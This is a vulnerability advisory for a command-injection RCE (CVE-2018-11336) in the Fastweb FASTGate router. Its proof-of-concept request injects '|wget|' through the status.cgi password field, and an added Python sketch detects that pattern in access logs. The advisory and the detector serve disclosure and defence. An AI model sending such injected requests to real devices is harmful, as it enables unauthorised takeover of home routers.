Fastweb FASTGate - 0.00.67 RCE Vulnerability

2018.10.13
Procode701 (IT)
Risk: High
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: Fastweb FASTGate - 0.00.67 RCE Vulnerability
# Date: 21-05-2018
# Exploit Authors: Procode701
# Contact: https://twitter.com/Procode701
# Vendor: Fastweb
# Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/
# Version: 0.00.67
# CVE: CVE-2018-11336

DESCRIPTION
========================================================================
A critical issue was discovered in the Fastweb FASTgate 0.00.67 device. FASTgate 0.00.67 is vulnerable to Remote Code Execution.

PROOF OF CONCEPT
[Affected Component] /status.cgi?_=
Vulnerable field: password=
Exploit sample: http://192.168.1.254/status.cgi_=1526904600131&cmd=3&nvget=login_confirm&password='|wget|'&remember_me=1&sessionKey=NULL&username=jj
Video: https://youtu.be/i3FuUQGA2fo
========================================================================

Timeline
Reported to vendor, 20/05/2018 - no response

References:

http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/
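
Detection sketch for the request pattern in the proof of concept, added here as an example and not part of the original advisory: it flags status.cgi login requests whose password parameter carries shell metacharacters. It assumes requests to the gateway are recorded by a proxy or network sensor in Common Log Format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Characters a shell treats specially. Heuristic only: a real password may contain them.
SHELL_META = set("|;&`$<>'\"\\\n")
# Common Log Format: client address, then the quoted request line (method, target).
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)[^"]*"')

def metachars_in_login(target):
    """Return the shell metacharacters found in the password of a status.cgi login."""
    parts = urlsplit(target)
    if not parts.path.startswith("/status.cgi"):
        return ""
    # Accept the advisory's sample form too, where no '?' precedes the parameters.
    query = parts.query or parts.path[len("/status.cgi"):]
    params = parse_qs(query, keep_blank_values=True)  # also percent-decodes values
    if "login_confirm" not in params.get("nvget", []):
        return ""
    found = {c for value in params.get("password", []) for c in value if c in SHELL_META}
    return "".join(sorted(found))

def scan(lines):
    """Return (client, metacharacters) for each log line that needs a closer look."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a request line in the assumed format
        found = metachars_in_login(m.group(3))
        if found:
            hits.append((m.group(1), found))
    return hits

# Constructed sample log lines (not captured traffic).
SAMPLE = [
    '192.168.1.23 - - [21/May/2018:10:00:01 +0200] "GET /status.cgi?_=1526904600131'
    '&cmd=3&nvget=login_confirm&password=Summer2018&remember_me=1&sessionKey=NULL'
    '&username=admin HTTP/1.1" 200 512',
    '192.168.1.77 - - [21/May/2018:10:02:17 +0200] "GET /status.cgi?_=1526904600131'
    '&cmd=3&nvget=login_confirm&password=%27%7Cwget%7C%27&remember_me=1'
    '&sessionKey=NULL&username=jj HTTP/1.1" 200 512',
    '192.168.1.23 - - [21/May/2018:10:03:40 +0200] "GET /status.cgi?_=1526904600200'
    '&cmd=7&nvget=wifi_status HTTP/1.1" 200 204',
]

if __name__ == "__main__":
    for client, chars in scan(SAMPLE):
        print(f"{client}: shell metacharacters {chars!r} in status.cgi login password")
```

Because the check decodes percent-encoding before matching, it catches the encoded and the raw form of the same value; a hit identifies a request to review, not a confirmed compromise.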

